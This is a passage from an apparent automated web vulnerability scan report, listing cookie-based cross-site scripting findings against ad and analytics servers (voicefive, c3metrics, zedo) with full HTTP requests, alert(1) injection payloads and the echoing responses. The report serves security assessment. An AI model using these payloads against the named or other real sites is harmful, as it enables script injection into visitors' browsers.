P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
5291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&27c6b'-alert(1)-'7895efa01c2', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.SurveySplash.start(({"Config":{"SurveyUrl":"http://survey2.voicef
...[SNIP]...

6.422. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the ar_p90175839 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4efe'-alert(1)-'9b2a6e788f1 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&c4efe'-alert(1)-'9b2a6e788f1; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:07 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
c=186884742&', "BMX_G": 'method->-1,ts->1303674270', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&c4efe'-alert(1)-'9b2a6e788f1', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630":
...[SNIP]...

6.423. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the ar_p91300630 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73db9'-alert(1)-'745c22fdff2 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&73db9'-alert(1)-'745c22fdff2; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:06 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&73db9'-alert(1)-'745c22fdff2', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.SurveySplash.start(({"Config":{"SurveyUrl":"http://surve
...[SNIP]...

6.424. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the ar_p97174789 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec38a'-alert(1)-'3511fe640c6 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&ec38a'-alert(1)-'3511fe640c6; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:09 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
CORE.BMX.SurveySplash.FolderName="p81479006";COMSCORE.BMX.SurveySplash.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&ec38a'-alert(1)-'3511fe640c6', "BMX_G": 'method->
...[SNIP]...

6.425. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/survey_splash.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64e71'-alert(1)-'b1acb9b3f34 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/survey_splash.pli?pid=p81479006&1303674292997 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=164e71'-alert(1)-'b1acb9b3f34; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:55:14 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 10132

var COMSCORE={BMX:{version:"3.0"}};COMSCORE.BMX.Utils={fireBeacon:function(A,B){setTimeout(function(){if(B){if(A.indexOf("?")==-1){A+="?";
}else{A+="&";}A+=(new Date()).getTime();}var C=new Image();C
...[SNIP]...
ySplash.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "BMX_G": 'method->-1,ts->1303674270', "ar_s_p81479006": '164e71'-alert(1)-'b1acb9b3f34', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p8147
...[SNIP]...

6.426. http://breathe.c3metrics.com/c3realview.js [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://breathe.c3metrics.com
Path:   /c3realview.js

Issue detail

The value of the C3UID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 372b9'%3balert(1)//28e517d2070 was submitted in the C3UID cookie. This input was echoed as 372b9';alert(1)//28e517d2070 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803372b9'%3balert(1)//28e517d2070; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:42 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-Length: 9648

(function(){c3CTJS={c3CTVersion:{vNo:'5.1.0'},c3CJS:{c3CJScampignId:'480',c3CJSdomain:null,c3VJSuid:'13014572191303613803372b9';alert(1)//28e517d2070',c3VJSnuid:'',c3CJSnetwork:'1',c3CJSOrganic:1,c3CJSOrganicQ:2,c3CJSlenSet:2,c3CJSSPlitchar:"-",c3CJSSearchString:null,c3CJSqueryVar:new Array(),c3CJSvtImg:"/1.gif",c3thisFileName:'c3metrics.php',c3CJS
...[SNIP]...

6.427. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae37d"-alert(1)-"eded134697f was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311ae37d"-alert(1)-"eded134697f; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:48 GMT
Connection: close
Content-Length: 2456

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...


if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311ae37d"-alert(1)-"eded134697f';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311ae37d"-alert(1)-"eded134697f;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.428. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 514d6"-alert(1)-"71155c21d89 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.06824745330959558 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311514d6"-alert(1)-"71155c21d89; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:01:25 GMT
Date: Sun, 24 Apr 2011 16:00:37 GMT
Connection: close
Content-Length: 2445

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...


if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311514d6"-alert(1)-"71155c21d89';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311514d6"-alert(1)-"71155c21d89;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.429. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae1c"-alert(1)-"df4b764fb20 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311bae1c"-alert(1)-"df4b764fb20; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=35
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:50 GMT
Connection: close
Content-Length: 2442

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...


if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311bae1c"-alert(1)-"df4b764fb20';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311bae1c"-alert(1)-"df4b764fb20;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.430. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ee7c"-alert(1)-"688e5a4f52f was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=homepageroadblock&$=&s=376&z=0.24159747382238178 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,21; FFad=0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~0424114ee7c"-alert(1)-"688e5a4f52f; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841|0,1,1;expires=Tue, 24 May 2011 16:47:33 GMT;path=/;domain=.zedo.com;
